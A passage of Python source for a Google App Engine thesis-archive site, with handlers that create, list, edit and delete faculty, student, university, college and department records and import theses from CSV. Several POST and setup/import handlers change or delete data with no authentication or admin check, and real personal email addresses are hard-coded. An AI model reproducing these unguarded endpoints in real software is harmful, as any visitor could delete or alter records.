'id':users.get_current_user().user_id()
}
}
self.response.out.write(json.dumps(response))
class ThesisPageHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesis.html')
self.response.write(template.render(template_values))
else:
self.redirect('/home')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class FacultyHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
link_text = 'Logout'
template_values = {
'links': links,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/faculty.html')
self.response.write(template.render(template_values))
else:
self.redirect('/home')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self):
faculty = Faculty()
faculty_department_temp = Department.query(Department.department_name == self.request.get('faculty_department'))
faculty_department_temp = faculty_department_temp.get()
faculty_department_key = faculty_department_temp.key
faculty.faculty_title = self.request.get('faculty_title')
faculty.faculty_fname = self.request.get('faculty_fname')
faculty.faculty_sname = self.request.get('faculty_sname')
faculty_full = faculty.faculty_fname + ' ' + faculty.faculty_sname
faculty.faculty_full = faculty_full
faculty.faculty_email = self.request.get('faculty_email')
faculty.faculty_phone = self.request.get('faculty_phone')
faculty.faculty_department = ndb.Key('Department', faculty_department_key.id())
faculty.faculty_bday = self.request.get('faculty_bday')
faculty.key = ndb.Key(Faculty, faculty_full.strip().replace(' ', '').replace('.','').replace(',','').lower())
faculty.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'title':faculty.faculty_title,
'first_name':faculty.faculty_fname,
'last_name':faculty.faculty_sname,
'full_name':faculty.faculty_full,
'email':faculty.faculty_email,
'phone':faculty.faculty_phone,
'bday':faculty.faculty_bday
}
}
self.response.out.write(json.dumps(response))
class StudentHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/student.html')
self.response.write(template.render(template_values))
else:
self.redirect('/home')
else:
self.redirect('/register')
def post(self):
student = Student()
student_department_temp = Department.query(Department.department_name == self.request.get('student_department'))
student_department_temp = student_department_temp.get()
student_department_key = student_department_temp.key
student.student_fname = self.request.get('student_fname')
student.student_sname = self.request.get('student_sname')
student.student_full = student.student_fname + ' ' + student.student_sname
student.student_phone = self.request.get('student_phone')
student.student_email = self.request.get('student_email')
student.student_number = self.request.get('student_number')
student.student_graduated = int(self.request.get('student_graduated'))
student.student_department = ndb.Key('Department', student_department_key.id())
student.student_bday = self.request.get('student_bday')
portions = []
for s in student.student_full.split():
if len(s) > 1 and s not in portions:
portions.append(s)
student.student_name_portions = portions
student.key = ndb.Key(Student, student.student_full.strip().replace(' ', '').replace('.','').replace(',','').lower())
student.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'first_name':student.student_fname,
'last_name':student.student_sname,
'full_name':student.student_full,
'phone':student.student_phone,
'email':student.student_email,
'student_number':student.student_number,
'year_graduated':student.student_graduated
}
}
self.response.out.write(json.dumps(response))
class UniversityHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/university.html')
self.response.write(template.render(template_values))
else:
self.redirect('/home')
else:
self.redirect('/register')
def post(self):
university = University()
university.university_name = self.request.get('university_name')
university.university_initial = self.request.get('university_initial')
university.university_address = self.request.get('university_address')
university.key = ndb.Key(University, university.university_initial.strip().replace(' ', '').replace('.','').replace(',','').lower())
university.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'university_name': university.university_name,
'university_initial': university.university_initial,
'university_address': university.university_address
}
}
self.response.out.write(json.dumps(response))
class CollegeHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/college.html')
self.response.write(template.render(template_values))
else:
self.redirect('/')
else:
self.redirect('/register')
def post(self):
college = College()
college_university_temp = University.query(University.university_name == self.request.get('college_university'))
college_university_temp = college_university_temp.get()
college_university_key = college_university_temp.key
college.college_university = ndb.Key('University', college_university_key.id())
college.college_name = self.request.get('college_name')
college.key = ndb.Key(College, college.college_name.strip().replace(' ', '').replace('.','').replace(',','').lower())
college.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'college_name': college.college_name
}
}
self.response.out.write(json.dumps(response))
class DepartmentHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/department.html')
self.response.write(template.render(template_values))
else:
self.redirect('/')
else:
self.redirect('/register')
def post(self):
department = Department()
department_college_temp = College.query(College.college_name == self.request.get('department_college'))
department_college_temp = department_college_temp.get()
department_college_key = department_college_temp.key
department_chair_temp = Faculty.query(Faculty.faculty_full == self.request.get('department_chair'))
department_chair_temp = department_chair_temp.get()
department_chair_key = department_chair_temp.key
department.department_college = ndb.Key('College', department_college_key.id())
department.department_name = self.request.get('department_name')
department.department_chair = ndb.Key('Faculty', department_chair_key.id())
department.key = ndb.Key(Department, department.department_name.strip().replace(' ', '').replace('.','').replace(',','').lower())
department.put()
college = College.query(College.key == department.department_college)
c = college.get()
logging.info(c)
collegelist = []
collegelist = c.college_departments
logging.info(collegelist)
collegelist.append(department.key)
c.college_departments = collegelist
c.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'department_name': department.department_name
}
}
self.response.out.write(json.dumps(response))
class DataImportHandler(webapp2.RequestHandler):
def get(self):
script_path = os.path.abspath(__file__) # i.e. /path/to/dir/foobar.py
script_dir = os.path.split(script_path)[0] #i.e. /path/to/dir/
rel_path = "data/data.csv"
abs_file_path = os.path.join(script_dir, rel_path)
filepath = open(abs_file_path)
file = csv.reader(filepath)
j = 0
for f in file:
thesis = thesisentry()
thesis.thesis_year = f[3]
thesis.thesis_title = f[4]
thesis.thesis_abstract = f[5]
thesis.thesis_section = f[6]
if len(f[7]) == 0:
f[7] = 'is_empty'
adviser_keyname = f[7].strip().replace(' ', '').replace('.','').replace(',','').lower()
adviser_name = f[7]
thesis_adviser = Faculty.get_by_keyname(adviser_keyname)
if thesis_adviser is None:
thesis_adviser = Faculty(key=ndb.Key(Faculty, adviser_keyname), faculty_full=f[7])
thesis_adviser.put()
thesis.thesis_adviser = thesis_adviser.key
department_name = f[2]
thesis_department = Department.get_by_name(department_name)
if thesis_department is None:
thesis_department = Department(key=ndb.Key(Department, department_name.strip().replace(' ', '').replace('.','').replace(',','').lower()), department_name=department_name)
thesis_department.put()
thesis.thesis_department = thesis_department.key
proponent = []
for i in range(8, 12):
if len(f[i]) is not 0:
proponent.append(f[i])
proponent_list = []
for p in proponent:
thesis_proponent = Student.get_by_name(p)
if thesis_proponent is None:
portions = []
for s in p.split():
if len(s) > 1 and s not in portions:
portions.append(s.lower())
thesis_proponent = Student(key=ndb.Key(Student, p.strip().replace(' ','').replace('.','').replace(',','').lower()), student_full=p, student_name_portions=portions)
thesis_proponent.put()
proponent_list.append(thesis_proponent.key)
thesis.thesis_proponent = proponent_list
tags = []
for t in thesis.thesis_title.split():
if len(t) >= 3 and t not in tags:
tags.append(t.lower())
thesis.thesis_tags = tags
thesis.put()
j += 1
logging.info(j)
filepath.close()
class SetupHandler(webapp2.RequestHandler):
def get(self):
fname = 'Pedrito '
sname = 'Tenerife, Jr.'
title = 'Engr. '
fullname = (fname + sname).strip().replace(' ','').replace('.','').replace(',','').lower()
chairperson = Faculty(key=ndb.Key(Faculty, fullname), faculty_fname=fname, faculty_sname=sname, faculty_title=title, faculty_full=title + fname + sname, faculty_email='jp.resuello07@gmail.com')
chairperson.put()
logging.info(chairperson.key.id())
fname1='Roman Angelo '
sname1='Tria'
title1 ='Engr. '
fullname1 = (fname1 + sname1).strip().replace(' ','').replace('.','').replace(',','').lower()
dbmsprof = Faculty(key=ndb.Key(Faculty, fullname1), faculty_fname=fname1, faculty_sname=sname1, faculty_title=title1, faculty_full=title1 + fname1 + sname1, faculty_email='gino.tr14@gmail.com')
dbmsprof.put()
logging.info(dbmsprof.key.id())
university = University(key=ndb.Key(University, 'pup'), university_name='Polytechnic University of the Philippines',university_address='Sta. Mesa, Manila',university_initial='PUP')
university.put()
college = College(key=ndb.Key(College, 'engineering'), college_name='Engineering', college_university=university.key)
college.put()
department = Department(key=ndb.Key(Department, 'coe'), department_name='COE', department_college=college.key, department_chair=chairperson.key)
department.put()
dept = []
dept.append(department.key)
college.college_departments = dept
college.put()
chairperson.faculty_department = department.key
dbmsprof.faculty_department = department.key
chairperson.put()
dbmsprof.put()
self.redirect('/')
class FacultyListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/facultylist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Department'] = {'List':'/department/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/facultylist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self):
faculty = Faculty()
faculty_department_temp = Department.query(Department.department_name == self.request.get('faculty_department'))
faculty_department_temp = faculty_department_temp.get()
faculty_department_key = faculty_department_temp.key
faculty.faculty_title = self.request.get('faculty_title')
faculty.faculty_fname = self.request.get('faculty_fname')
faculty.faculty_sname = self.request.get('faculty_sname')
faculty_full = faculty.faculty_fname + ' ' + faculty.faculty_sname
faculty.faculty_full = faculty_full
faculty.faculty_email = self.request.get('faculty_email')
faculty.faculty_phone = self.request.get('faculty_phone')
faculty.faculty_department = ndb.Key('Department', faculty_department_key.id())
faculty.faculty_bday = self.request.get('faculty_bday')
faculty.key = ndb.Key(Faculty, faculty_full.strip().replace(' ', '').replace('.','').replace(',','').lower())
faculty.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'title':faculty.faculty_title,
'first_name':faculty.faculty_fname,
'last_name':faculty.faculty_sname,
'full_name':faculty.faculty_full,
'email':faculty.faculty_email,
'phone':faculty.faculty_phone,
'bday':faculty.faculty_bday
}
}
self.response.out.write(json.dumps(response))
class FacultyAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
facultylist = Faculty.query().order(Faculty.created_date).fetch()
faculty = []
for f in facultylist:
faculty.append({
'id':f.key.id(),
'title':f.faculty_title,
'first_name':f.faculty_fname,
'last_name':f.faculty_sname,
'full_name':f.faculty_full,
'email':f.faculty_email,
'phone':f.faculty_phone
})
response = {
'result' : 'OK',
'faculty_data': faculty
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class ThesisCreateAPI(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
facultylist = Faculty.query().order(Faculty.created_date).fetch()
faculty = []
for f in facultylist:
faculty.append({
'title':f.faculty_title,
'first_name':f.faculty_fname,
'last_name':f.faculty_sname,
'full_name':f.faculty_full,
'email':f.faculty_email,
'phone':f.faculty_phone
})
studentlist = Student.query().order(Student.created_date).fetch()
student = []
for s in studentlist:
student.append({
'first_name':s.student_fname,
'last_name':s.student_sname,
'full_name':s.student_full,
'phone':s.student_phone,
'email':s.student_email,
'student_number':s.student_number,
'year_graduated':s.student_graduated
})
departmentlist = Department.query().order(Department.created_date).fetch()
department = []
for d in departmentlist:
col = College.query(College.key == d.department_college)
c = []
for co in col:
c.append({
'name':co.college_name
})
department.append({
'college':c,
'name':d.department_name
})
response = {
'result' : 'OK',
'faculty_data': faculty,
'student_data': student,
'department_data':department
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class StudentsAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
studentlist = Student.query().order(Student.created_date).fetch()
student = []
for s in studentlist:
student.append({
'id': s.key.id(),
'first_name':s.student_fname,
'last_name':s.student_sname,
'full_name':s.student_full,
'phone':s.student_phone,
'email':s.student_email,
'student_number':s.student_number,
'year_graduated':s.student_graduated,
'birthday':s.student_bday
})
response = {
'result' : 'OK',
'data': student
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class StudentListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
if user.is_admin:
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/studentlist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Department'] = {'List':'/department/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/studentlist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class UniversityAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
universitylist = University.query().order(University.created_date).fetch()
university = []
for u in universitylist:
university.append({
'id': u.key.id(),
'university_name': u.university_name,
'university_initial': u.university_initial,
'university_address': u.university_address
})
response = {
'result' : 'OK',
'data': university
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class UniversityListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/universitylist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Departments'] = {'List':'/department/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/universitylist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class CollegeAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
collegelist = College.query().order(College.created_date).fetch()
college = []
for c in collegelist:
un = University.query(University.key == c.college_university)
un = un.get()
college.append({
'id' : c.key.id(),
'college_name': c.college_name,
'college_university': un.university_name
})
response = {
'result' : 'OK',
'data': college
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class CollegeListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/collegelist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Departments'] = {'List':'/department/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/collegelist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class DepartmentAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
departmentlist = Department.query().order(Department.created_date).fetch()
dept = []
for d in departmentlist:
c = College.query(College.key == d.department_college)
c = c.get()
# u = University.query(University.key == c.key)
# u = u.get()
f = Faculty.query(Faculty.key == d.department_chair)
f = f.get()
dept.append({
'id':d.key.id(),
# 'department_university':u.university_name,
'department_name': d.department_name,
'department_college': c.college_name,
'department_chair': f.faculty_full
})
response = {
'result' : 'OK',
'data': dept
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class DepartmentListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/departmentlist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Departments'] = {'List':'/department/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/departmentlist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class FacultyDeleteHandler(webapp2.RequestHandler):
def post(self, id):
faculty = Faculty.get_by_id(id)
faculty.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class FacultyEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
faculty = Faculty.get_by_id(id)
department = None
if faculty.faculty_department is not None:
department = Department.query(Department.key == faculty.faculty_department)
department = department.get()
department = department.department_name
data = {
'links':links,
'item' : faculty,
'dept' : department,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/facultyedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
faculty = Faculty()
faculty_department_temp = Department.query(Department.department_name == self.request.get('faculty_department'))
faculty_department_temp = faculty_department_temp.get()
faculty_department_key = faculty_department_temp.key
faculty.faculty_title = self.request.get('faculty_title')
faculty.faculty_fname = self.request.get('faculty_fname')
faculty.faculty_sname = self.request.get('faculty_sname')
faculty_full = faculty.faculty_fname + ' ' + faculty.faculty_sname
faculty.faculty_full = faculty_full
faculty.faculty_email = self.request.get('faculty_email')
faculty.faculty_phone = self.request.get('faculty_phone')
faculty.faculty_department = ndb.Key('Department', faculty_department_key.id())
faculty.faculty_bday = self.request.get('faculty_bday')
faculty.key = ndb.Key(Faculty, id)
faculty.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'title':faculty.faculty_title,
'first_name':faculty.faculty_fname,
'last_name':faculty.faculty_sname,
'full_name':faculty.faculty_full,
'email':faculty.faculty_email,
'phone':faculty.faculty_phone,
'bday':faculty.faculty_bday
}
}
self.response.out.write(json.dumps(response))
class StudentDeleteHandler(webapp2.RequestHandler):
def post(self, id):
student = Student.get_by_id(id)
student.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class StudentEdithandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
student = Student.get_by_id(id)
department = None
if student.student_department is not None:
department = Department.query(Department.key == student.student_department)
department = department.get()
department = department.department_name
data = {
'links' : links,
'item' : student,
'id':id,
'dept' : department,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/studentedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
student = Student()
student_department_temp = Department.query(Department.department_name == self.request.get('student_department'))
student_department_temp = student_department_temp.get()
student_department_key = student_department_temp.key
student.student_fname = self.request.get('student_fname')
student.student_sname = self.request.get('student_sname')
student.student_full = student.student_fname + ' ' + student.student_sname
student.student_phone = self.request.get('student_phone')
student.student_email = self.request.get('student_email')
student.student_number = self.request.get('student_number')
